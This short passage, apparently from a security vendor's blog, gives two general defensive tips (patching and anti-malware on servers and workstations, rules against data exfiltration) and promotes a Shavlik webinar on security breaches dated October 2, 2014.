1)  Prevent threats from getting on their network by protecting servers AND WORKSTATIONS with patching and anti-malware technologies.

2)  Prevent data theft by implementing more specific rules on key areas and equipment on their network to stop data exfiltration.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do to protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT